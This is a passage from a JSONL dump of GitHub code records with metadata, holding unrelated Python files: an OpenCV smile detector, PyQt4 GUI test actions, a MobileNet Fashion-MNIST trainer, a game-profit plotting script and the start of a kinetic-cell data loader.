"django.db.models.Q", "line_number": 77, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 87, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Company.objects.get", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Company.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.Company", "line_number": 101, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "73709425245", "text": "# -*- coding=utf-8 -*-\r\nimport cv2\r\n\r\n\r\nfacePath = \"src/lbpcascade_frontalface.xml\"\r\nfaceCascade = cv2.CascadeClassifier(facePath)\r\n\r\nsmilePath = \"src/haarcascade_smile.xml\"\r\nsmileCascade = cv2.CascadeClassifier(smilePath)\r\n\r\n\r\ndef main():\r\n    video_capture = cv2.VideoCapture(0)\r\n\r\n\r\n    while True:\r\n        # Capture frame-by-frame\r\n        ret, frame = video_capture.read()\r\n\r\n\r\n\r\n        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n\r\n        faces = faceCascade.detectMultiScale(\r\n            gray,\r\n            scaleFactor= 1.1,\r\n            minNeighbors=8,\r\n            minSize=(55, 55),\r\n
flags=cv2.CASCADE_SCALE_IMAGE\r\n )\r\n\r\n\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 2)\r\n roi_gray = gray[y:y+h, x:x+w]\r\n roi_color = frame[y:y+h, x:x+w]\r\n\r\n\r\n smile = smileCascade.detectMultiScale(\r\n roi_gray,\r\n scaleFactor= 1.16,\r\n minNeighbors=35,\r\n minSize=(25, 25),\r\n flags=cv2.CASCADE_SCALE_IMAGE\r\n )\r\n\r\n\r\n for (x2, y2, w2, h2) in smile:\r\n cv2.rectangle(roi_color, (x2, y2), (x2+w2, y2+h2), (255, 0, 0), 2)\r\n cv2.putText(frame,'Smile',(x,y-7), 3, 1.2, (0, 255, 0), 2, cv2.LINE_AA)\r\n\r\n k = cv2.waitKey(1)\r\n if k%256 == 27:\r\n # ESC pressed\r\n print(\"Escape hit, closing...\")\r\n break\r\n\r\n cv2.namedWindow(\"Video\", cv2.WND_PROP_FULLSCREEN)\r\n cv2.setWindowProperty(\"Video\",cv2.WND_PROP_FULLSCREEN,cv2.WINDOW_FULLSCREEN)\r\n cv2.imshow('Video', frame)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n # When everything is done, release the capture\r\n video_capture.release()\r\n cv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "repo_name": "laurentmnr/face_reco_app", "sub_path": "src/smile.py", "file_name": "smile.py", "file_ext": "py", "file_size_in_byte": 1885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.CASCADE_SCALE_IMAGE", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.CASCADE_SCALE_IMAGE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.waitKey", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.WND_PROP_FULLSCREEN", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.setWindowProperty", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.WND_PROP_FULLSCREEN", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cv2.WINDOW_FULLSCREEN", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "27596316867", "text": "\"\"\"These tests are used to check functionality. 
They were written for KDE4 and\na window size of 900x600 and might not work on other configurations\"\"\"\n\n\n\nfrom PyQt4.QtTest import QTest\nfrom PyQt4.QtCore import Qt\n\nfrom gui import win\nfrom lib.action import Action\nfrom lib import qtest\n\n# initialize the qtest module\nqtest.init(win)\n\n\ndef cube_diagonal_():\n QTest.keyPress(win.viewer_3d, Qt.Key_P, Qt.AltModifier)\n qtest.click_at([250, 180])\n qtest.click_at([210, 440])\n qtest.click_at([650, 400])\n QTest.keyPress(win, Qt.Key_X, Qt.AltModifier)\n qtest.click_at([400, 50])\n qtest.click_at([400, 400])\n QTest.keyPress(win, Qt.Key_Space, Qt.NoModifier)\n qtest.click_at([700, 100])\n QTest.keyPress(win, Qt.Key_G, Qt.ControlModifier)\n qtest.click_at([215, 440])\n QTest.keyPress(win, Qt.Key_Space)\n QTest.keyPress(win, Qt.Key_Space)\n qtest.click_at([660, 90])\ncube_diagonal = Action(cube_diagonal_, ('&Unit Tests', 'Cube &Diagonal'))\n\n\ndef u_bahn_():\n # cube\n QTest.keyPress(win.viewer_3d, Qt.Key_B, Qt.ControlModifier)\n qtest.mouse_move([350, 320])\n QTest.keyPress(win.viewer_3d, Qt.Key_C, Qt.NoModifier, 100)\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_Z, Qt.NoModifier)\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_Minus,\n Qt.NoModifier)\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_1, Qt.NoModifier)\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_Return,\n Qt.NoModifier)\n qtest.mouse_move([430, 320])\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_Return,\n Qt.NoModifier)\n qtest.click_at([430, 330])\n # sphere\n qtest.click_at([120, 10])\n qtest.click_at([120, 130])\n qtest.click_at([390, 320])\n qtest.click_at([430, 320])\n # intersection\n qtest.click_at([200, 10])\n qtest.click_at([200, 55])\n qtest.click_at([390, 320])\n qtest.click_at([370, 330])\n # delete\n qtest.click_at([200, 10])\n qtest.click_at([200, 30])\n qtest.click_at([390, 320])\n qtest.click_at([360, 320])\n QTest.keyPress(win.viewer_3d, Qt.Key_Escape, Qt.NoModifier)\nu_bahn = Action(u_bahn_, ('&Unit Tests', '&U-Bahn'))\n\n\ndef view_control_():\n qtest.click_at([250, 15])\n qtest.click_at([250, 30])\nview_control = Action(view_control_, ('&Unit Tests', '&View control'))\n\ntoolbar_visible = True\n\nlist = [cube_diagonal, u_bahn, view_control]\n", "repo_name": "kozintsev/kubos-research", "sub_path": "actions/unit_test.py", "file_name": "unit_test.py", "file_ext": "py", "file_size_in_byte": 2442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "lib.qtest.init", "line_number": 14, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 14, "usage_type": "argument"}, {"api_name": "lib.qtest", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 18, "usage_type": "name"}, {"api_name": "gui.win.viewer_3d", "line_number": 18, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_P", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AltModifier", "line_number": 18, "usage_type": "attribute"}, {"api_name": "lib.qtest.click_at", "line_number": 19, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 19, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 20, "usage_type": "call"}, 
{"api_name": "lib.qtest", "line_number": 20, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 21, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 22, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 22, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_X", "line_number": 22, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AltModifier", "line_number": 22, "usage_type": "attribute"}, {"api_name": "lib.qtest.click_at", "line_number": 23, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 23, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 24, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 24, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 25, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 25, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Space", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 25, "usage_type": "attribute"}, {"api_name": "lib.qtest.click_at", "line_number": 26, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 27, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 27, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 27, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_G", "line_number": 27, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 27, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.ControlModifier", "line_number": 27, "usage_type": "attribute"}, {"api_name": "lib.qtest.click_at", "line_number": 28, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 28, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 29, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 29, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 29, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Space", "line_number": 29, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 29, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 30, "usage_type": "call"}, {"api_name": "gui.win", "line_number": 30, "usage_type": "argument"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 30, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Space", "line_number": 30, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 30, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 31, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 31, "usage_type": "name"}, {"api_name": "lib.action.Action", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 37, "usage_type": "name"}, {"api_name": "gui.win.viewer_3d", "line_number": 37, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 37, 
"usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_B", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.ControlModifier", "line_number": 37, "usage_type": "attribute"}, {"api_name": "lib.qtest.mouse_move", "line_number": 38, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 38, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 39, "usage_type": "name"}, {"api_name": "gui.win.viewer_3d", "line_number": 39, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_C", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 40, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 40, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Z", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 41, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 41, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Minus", "line_number": 41, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 43, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_1", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 44, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 44, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Return", "line_number": 44, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 44, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 45, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 45, "usage_type": "name"}, {"api_name": "lib.qtest.mouse_move", "line_number": 46, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 46, "usage_type": 
"name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 47, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 47, "usage_type": "name"}, {"api_name": "gui.win.command_dock_widget", "line_number": 47, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Return", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 48, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 48, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 49, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 49, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 51, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 51, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 52, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 52, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 53, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 53, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 54, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 54, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 56, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 56, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 57, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 57, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 58, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 58, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 59, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 59, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 61, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 61, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 62, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 62, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 63, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 63, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 64, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 64, "usage_type": "name"}, {"api_name": "PyQt4.QtTest.QTest.keyPress", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt4.QtTest.QTest", "line_number": 65, "usage_type": "name"}, {"api_name": "gui.win.viewer_3d", "line_number": 65, "usage_type": "attribute"}, {"api_name": "gui.win", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.Key_Escape", "line_number": 65, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.NoModifier", "line_number": 65, "usage_type": "attribute"}, {"api_name": "lib.action.Action", "line_number": 66, "usage_type": "call"}, {"api_name": "lib.qtest.click_at", "line_number": 70, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 70, "usage_type": "name"}, {"api_name": "lib.qtest.click_at", "line_number": 71, "usage_type": "call"}, {"api_name": "lib.qtest", "line_number": 71, "usage_type": "name"}, {"api_name": "lib.action.Action", "line_number": 72, "usage_type": "call"}]} 
+{"seq_id": "2823773315", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tqdm import tqdm\nfrom skimage.transform import resize\nfrom tensorflow.keras import backend as K\nimport os\n\ndef create_model():\n\n# load MobileNet v2 and construct a classifier\n\n\tmbnet = tf.keras.applications.MobileNet(\n\t\tinput_shape = (56, 56, 3),\n\t\tinclude_top = False,\n\t\tpooling = 'avg')\n\n\tpred_layer = tf.keras.layers.Dense(10, activation='softmax')\n\n\tinputs = tf.keras.Input(shape = (56, 56))\n\tinput_image_ = tf.keras.layers.Lambda(lambda x: K.repeat_elements(K.expand_dims(x,3),3,3))(inputs)\n\tx = mbnet(input_image_)\n\tx = tf.keras.layers.Dropout(0.5)(x)\n\toutputs = pred_layer(x)\n\tmodel = tf.keras.Model(inputs, outputs)\n\n\tmodel.compile(optimizer = tf.keras.optimizers.Adam(lr=0.001),\n\t\tloss = 'sparse_categorical_crossentropy',\n\t\tmetrics = ['accuracy'])\n\tmodel.summary()\n\n\treturn model\n\n\ndef main():\n\n\t# load training and testing data from fashion mnist\n\n\tfashion_mnist = tf.keras.datasets.fashion_mnist\n\t(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n\t# resize the images to 56x56\n\n\theight, width = 56, 56\n\n\ttrain_images = train_images.reshape((-1,28,28))\n\ttrain_images = np.array([resize(x, (height,width)).astype(float) for x in tqdm(iter(train_images))])/255.\n\n\ttest_images = test_images.reshape((-1,28,28))\n\ttest_images = np.array([resize(x, (height,width)).astype(float) for x in tqdm(iter(test_images))])/255.\n\n\tprint(train_images.shape)\n\n\tmodel = create_model()\n\n\tweight_path = \"./weights-3/cp-{epoch:04d}.ckpt\"\n\n\tbatch_size = 128\n\n\tcallback = tf.keras.callbacks.ModelCheckpoint(\n\t\tfilepath = weight_path,\n\t\tverbose = 1,\n\t\tsave_weights_only = True,\n\t\tsave_freq = 5*batch_size)\n\n\thistory = model.fit(train_images, train_labels, batch_size=batch_size, epochs=50, callbacks = [callback], validation_data = (test_images, test_labels))\n\nif __name__ == '__main__':\n\tmain()", "repo_name": "StevenLu1204/Coding-exercise-with-FashionMNIST", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "tensorflow.keras.applications.MobileNet", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Input", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Lambda", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.backend.repeat_elements", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 21, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.expand_dims", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Model", "line_number": 25, "usage_type": "call"}, {"api_name": 
"tensorflow.keras", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 47, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 50, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "37409264766", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\n\ndef main():\n\t\"\"\"\n\timport data from csv file, plot multi line graph, and save it.\n\t\"\"\"\n\n\tdf = pd.read_csv(\"Ohono_Territories.csv\")\n\n\tprint(df.head())\n\n\tsmall_df = df[[\"Territory\",\"3\",\"4\",\"2\",\"1\"]]\n\tsmall_df[\"4\"]=small_df[\"4\"].astype(float)\n\tsmall_df[\"3\"]=small_df[\"3\"].astype(float)\n\tsmall_df[\"2\"]=small_df[\"2\"].astype(float)\n\tsmall_df[\"1\"]=small_df[\"1\"].astype(float)\n\tprint(small_df.head())\n\tsmall_df=small_df.pivot_table(columns=\"Territory\")\n\tsmall_df = small_df[[\n\t# \"Restless Shores\", \n\t\"Monarch's Bluffs\",\n\t # \"Reekwater\", \n\t \"Weaver's Fen\", \n\t \"Cutlass Keys\", \n\t \"Mourningdale\", \n\t \"First Light\", \n\t # \"Brightwood\", \n\t \"Everfall\", \n\t # \"Windsward\", \n\t \"Ebonscale Reach\",\n\t ]]\n\tprint(small_df.head())\n\tax = small_df.plot(ylim=(0,2100000), lw=2, marker='.', markersize=10, title='Profits by Territory', grid=True)\n\t# ax.set(xlabel=\"Week\", ylabel=\"Profit in Coin\")\n\tax.set_ylabel(\"Profit in Coin\", labelpad=0)\n\tax.set_xlabel(\"Week\")\n\tplt.legend(ncol=2)\n\tax.get_figure().savefig(\"Profits_Non_Yellow.png\")\n\treturn 0\n\nif __name__ == \"__main__\":\n\tmain()", "repo_name": "eparrish64/NewWorld_TerritoryProfitTracking", "sub_path": "Territory_Profit_Plotting.py", "file_name": "Territory_Profit_Plotting.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "30091337539", "text": "import numpy as np \nimport pandas as pd\nimport networkx as nx\nimport glob, os, warnings\nimport matplotlib.pyplot as plt\n\nfrom scipy.stats import linregress\nfrom scipy.integrate import trapz, cumtrapz\nfrom scipy.optimize import minimize\nfrom sklearn.cluster import KMeans, SpectralClustering\n\n\nfrom .base_data import BaseData\nfrom utils.utils import isoconversional_analysis\n\n\ndef load_rto_data(data_path, clean_data = True, return_O2_con_in = False):\n\n df = pd.read_excel(data_path + '.xls')\n \n # Read in data\n Time = df.Time.values/60\n O2 = df.O2.values\n CO2 = df.CO2.values\n Temp = df.Temperature.values\n \n ind100C = np.amin(np.asarray(Temp > 100).nonzero())\n ind120C = np.amin(np.asarray(Temp > 
120).nonzero())\n    T_max = np.amax(Temp)\n    inds750 = np.asarray(Temp > T_max - 5).nonzero()[0]\n    if inds750.shape[0] < 10:\n        ind750C1 = Temp.shape[0]-3\n        ind750C2 = Temp.shape[0]-2\n    else:\n        ind750C1 = inds750[np.round(0.75*inds750.shape[0]).astype(int)]\n        ind750C2 = inds750[np.round(0.9*inds750.shape[0]).astype(int)]\n\n\n    # Gather datapoints and perform linear regression correction\n    correction_times = np.concatenate([Time[ind100C:ind120C+1], Time[ind750C1:ind750C2+1]])\n    correction_O2s = np.concatenate([O2[ind100C:ind120C+1], O2[ind750C1:ind750C2+1]])\n    slope, intercept, _, _, _ = linregress(correction_times, correction_O2s)\n    O2_baseline = slope*Time + intercept\n    O2_con_in = intercept\n\n\n    # Calculate %O2 consumption and conversion\n    O2_consumption = np.maximum(O2_baseline - O2, 0)\n\n    start_ind_max, end_ind_max_O2 = find_start_end(O2_consumption)\n    O2_consumption[:start_ind_max] = 0\n    O2_consumption[end_ind_max_O2:] = 0\n\n    # correct CO2s\n    correction_CO2s = np.concatenate([CO2[ind100C:ind120C+1], CO2[ind750C1:ind750C2+1]])\n    slope, intercept, _, _, _ = linregress(correction_times, correction_CO2s)\n    CO2_baseline = slope*Time + intercept\n    CO2_production = np.maximum(CO2 - CO2_baseline, 0)\n\n    start_ind_max, end_ind_max_CO2 = find_start_end(CO2_production)\n    CO2_production[:start_ind_max] = 0\n    CO2_production[end_ind_max_CO2:] = 0 \n\n    # remove final times\n    global_max_ind = max(end_ind_max_O2, end_ind_max_CO2)\n    Time = Time[:global_max_ind]\n    Temp = Temp[:global_max_ind]\n    O2_consumption = O2_consumption[:global_max_ind]\n    CO2_production = CO2_production[:global_max_ind]\n    \n    ydict = {'Time': Time, 'Temp': Temp, 'O2_consumption': O2_consumption, 'O2_con_in': O2_con_in, \n        'CO2_production': CO2_production}\n    \n    return ydict\n    \n\ndef find_start_end(x):\n    '''\n    Find start and end time stamps from array x\n    \n    '''\n    \n    start_ind = 0\n    end_ind = 0\n    start_ind_max = 0\n    end_ind_max = x.shape[0]\n    cumsum = 0.0\n    max_cumsum = 0.0\n    for i in range(x.shape[0]):\n        if x[i] <= 0:\n            if cumsum > max_cumsum:\n                max_cumsum = cumsum\n                start_ind_max = start_ind\n                end_ind_max = end_ind\n            \n            cumsum = 0.0\n            start_ind = i\n            end_ind = i\n        \n        else:\n            cumsum += x[i]\n            end_ind += 1\n    \n    return start_ind_max, end_ind_max\n\n\nclass RtoData(BaseData):\n\n    @staticmethod\n    def modify_cmd_options(parser):\n        parser.set_defaults(data_dir=os.path.join('datasets', 'RTO'))\n        parser.add_argument('--data_from_default', type=str, default='None', help='load data from simulating default reaction')\n        parser.add_argument('--dataset', type=str, default='synthetic', help='name of dataset to load from \'datasets/RTO\' directory')\n        parser.add_argument('--Oil_con_init', type=float, default=0.04, help='initial concentration of oil in kinetic cell')\n        parser.add_argument('--interp_num', type=int, default=200, help='number of points to interpolate experimental data onto')\n        return parser\n\n\n    def __init__(self, opts):\n        super().__init__(opts)\n\n\n    def data_load(self, opts):\n        '''\n        Parse the input data files for experimental kinetic cell models\n\n        '''\n\n        self.Oil_con_init = opts.Oil_con_init\n\n        self.heating_rates = [float(name[:-9]) for name in os.listdir(self.dataset_dir) if name[-9:].lower()=='c_min.xls']\n\n        # Begin loading data\n        self.heating_data = {}\n        